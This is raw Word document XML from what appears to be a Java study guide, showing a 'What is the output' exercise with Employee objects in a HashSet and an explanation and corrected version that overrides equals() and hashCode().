          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to determine the bucket location in the HashMap. By overriding it to generate the hash code based on id and name, we ensure that objects with the same id and name will have the same hash code, leading to correct behavior in the HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9E7870" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00" w:rsidP="006A6E0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ithout Overriding equals() and hashCode():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367F06AD" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00" w:rsidP="006A6E0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ithout these overrides, the HashMap would store each object as a unique entry, and the output would be 5 because e1, e2, etc., are different objects in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0BE878" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00" w:rsidP="006A6E00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6616FBC4" w14:textId="3E5A8D39" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="373" w:name="_Toc196307853"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00113574" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="373"/>
    </w:p>
    <w:p w14:paraId="0C3C9AF9" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>publ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class</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Employee</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0C11F410" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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id</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String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CCC6BB" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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Employee</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id</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String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F0C142" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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thi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id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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3032EC33" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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thi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nam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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9C37AC" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>//this.addr = add;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00107E7B" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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13D0E29E" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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4F928823" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> test</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437D8BD0" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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publ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stat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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>String</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args</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42697DCF" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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640C4078" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e1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Employee</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1</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A"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4512265E" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e2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Employee</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1</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A"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6456B7C4" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e3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Employee</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1</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A"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD4CF50" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e4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Employee</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1</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A"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18222C99" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e5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Employee</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1</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A"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721598DC" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> h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HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4196215D" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
        <w:t>h</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add</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e1</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e1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378AC6ED" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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61FE3947" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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70E8480F" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
        <w:t>h</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add</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e5</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e5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A215D8A" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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System</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ou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println</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HS siz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h</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size</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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0E34CD" w14:textId="77777777" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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77356E7C" w14:textId="70F73910" w:rsidR="00E059B1" w:rsidRPr="00CE4B95"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27C41FA7" w14:textId="28784A50" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B5AF7FF" w14:textId="77777777" w:rsidR="00333842" w:rsidRPr="00CE4B95" w:rsidRDefault="00333842" w:rsidP="00DD6565">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="618A22C0" w14:textId="77777777" w:rsidR="00333842" w:rsidRPr="00CE4B95" w:rsidRDefault="00333842" w:rsidP="00DD6565">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776C8F07" w14:textId="6BE8EAF1" w:rsidR="00DD6565" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6565" w:rsidP="00DD65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Your code has a couple of issues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB7E60C" w14:textId="77777777" w:rsidR="00DD6565" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6565">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Set Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HashSet is a set, and it only accepts a single argument per element. It should not be used with two arguments like h.add(e1, e1);. The correct usage would be h.add(e1); to add the Employee object into the set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C01206B" w14:textId="77777777" w:rsidR="00DD6565" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6565">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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mployee Class Doesn't Override equals() and hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To ensure that HashSet can properly identify whether two Employee objects are equal (based on their id and name), you must override the equals() and hashCode() methods in the Employee class. If you don't, HashSet will rely on the default equals() and hashCode() methods, which compare object references (memory locations) rather than the actual content of the Employee objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72457C57" w14:textId="77777777" w:rsidR="00DD6565" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6565" w:rsidP="00DD65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s a corrected version of the code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBFFCC7" w14:textId="77777777" w:rsidR="00DD6565" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6565" w:rsidP="00DD656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rrected Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABB19BE"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HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D74433"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Objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B601884"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10995E71"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6C8CA66"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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4009917B"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4A1F0123"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227B734F"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5035E22"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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3F46A6"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1F86115E"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5550C6D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACAA429"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verride equals to compare Employee objects based on id and name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B08AEC2"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0725179B"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equals</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Objec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5074198"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thi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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726C251B"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obj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getClas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Clas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39D86230"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> employe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p>
    <w:p w14:paraId="3D3B9C23"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i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mploye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d </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</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qual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ame</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E1B63E"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81945F6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9DB540"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verride hashCode to ensure consistent hashing based on id and name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693F2BA5"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377A3926"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hashCod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6EF4955"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Objec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has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04DD3C9E"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66B1ABE"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EDBE58"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAC0F35"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es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FD04AE7"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4D67A46"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631DC118"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0785A4B1"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e3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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0BCE27"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e4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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F07C52"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e5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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDE1A92"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAE4980"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Se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h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Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C469416"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h</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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AABC8B7"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h</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2</w:t>
      </w:r>
